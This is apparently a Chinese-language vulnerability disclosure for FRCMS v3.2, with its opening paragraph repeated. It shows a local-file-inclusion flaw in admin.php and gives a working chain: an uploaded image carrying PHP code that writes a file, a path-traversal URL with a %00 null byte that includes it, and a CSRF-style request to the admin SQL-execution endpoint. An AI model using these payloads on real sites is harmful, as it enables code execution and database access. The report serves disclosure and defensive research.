VULHUB ™

### 简要描述： 宁夏刚刚地震了。。。 而我正在提交漏洞。。。 我tm是在拿生命提交漏洞啊。。。。 地震的同时我还在写过程 脑子一抽 手一哆嗦..误删了。。。强烈要求添加一个撤销操作功能 ### 详细说明： 首先看 admin/admin.php 最后部分的代码 ``` }else{ $mod=$_GET['m'];$act=$_GET['a']; aPurview($mod,$act);//检测管员权限 if(file_exists(ADMIN_ROOT.'inc/'.$mod.'.inc.php')){ require_once ADMIN_ROOT.'inc/'.$mod.'.inc.php'; //$actmod=new $mod(); // if($act&&method_exists($actmod,$act)){ // $actmod->$act(); // }else{ // $actmod->index(); // } } $smarty->assign('menulist',ashowmenu()); $smarty->display('index.htm'); } ``` 如果ADMIN_ROOT.'inc/'.$mod.'.inc.php存在则包含此文件。$mod可控。 直接截断即可 [<img src="https://images.seebug.org/upload/201504/15161138271ab931f2e9228b66e8b780b2231e20.jpg" alt="N[UP%E7[DPYU@8S5YFH]F[0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15161138271ab931f2e9228b66e8b780b2231e20.jpg) 包含robots.txt文件 接着 我注册一个账号 去上传图片 图片代码为 ``` <?php file_put_contents("x.php","xxxxxxxxxxxxx");?> ``` 这是路径/upfiles/company/file/20150415/20150415142756_455.jpg 构造如下URL...

### 简要描述： 宁夏刚刚地震了。。。 而我正在提交漏洞。。。 我tm是在拿生命提交漏洞啊。。。。 地震的同时我还在写过程 脑子一抽 手一哆嗦..误删了。。。强烈要求添加一个撤销操作功能 ### 详细说明： 首先看 admin/admin.php 最后部分的代码 ``` }else{ $mod=$_GET['m'];$act=$_GET['a']; aPurview($mod,$act);//检测管员权限 if(file_exists(ADMIN_ROOT.'inc/'.$mod.'.inc.php')){ require_once ADMIN_ROOT.'inc/'.$mod.'.inc.php'; //$actmod=new $mod(); // if($act&&method_exists($actmod,$act)){ // $actmod->$act(); // }else{ // $actmod->index(); // } } $smarty->assign('menulist',ashowmenu()); $smarty->display('index.htm'); } ``` 如果ADMIN_ROOT.'inc/'.$mod.'.inc.php存在则包含此文件。$mod可控。 直接截断即可 [<img src="https://images.seebug.org/upload/201504/15161138271ab931f2e9228b66e8b780b2231e20.jpg" alt="N[UP%E7[DPYU@8S5YFH]F[0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15161138271ab931f2e9228b66e8b780b2231e20.jpg) 包含robots.txt文件 接着 我注册一个账号 去上传图片 图片代码为 ``` <?php file_put_contents("x.php","xxxxxxxxxxxxx");?> ``` 这是路径/upfiles/company/file/20150415/20150415142756_455.jpg 构造如下URL http://localhost/frcms_v3.2_GBK/uploads/admin/admin.php?m=../../upfiles/company/file/20150415/20150415142756_455.jpg%00 然后找个提交的地方 嵌入一个远程URL为以上URL 等待管理审核即可。。 我这直接在后台提交。。。 [<img src="https://images.seebug.org/upload/201504/151617541df9df9315f393d420a8dbd7cd11b922.png" alt="DPH7`3Y(ZNBC2[8}V@KZ1GE.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/151617541df9df9315f393d420a8dbd7cd11b922.png) [<img src="https://images.seebug.org/upload/201504/151622107a639ffc43697158b4192376768fc7a0.png" alt="M`5_]RW982H4OOM%@RW6`0T.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/151622107a639ffc43697158b4192376768fc7a0.png) ``` http://localhost/frcms_v3.2_GBK/uploads/admin/admin.php?m=websys_execsql&a=doexecsql sql=select user()&submit=+Ö´+ÐÐ+ ``` 无token 未验证referer poc我也不填了。。都因为刚才手抖给删了。。说多了都是泪。 ### 漏洞证明： 如上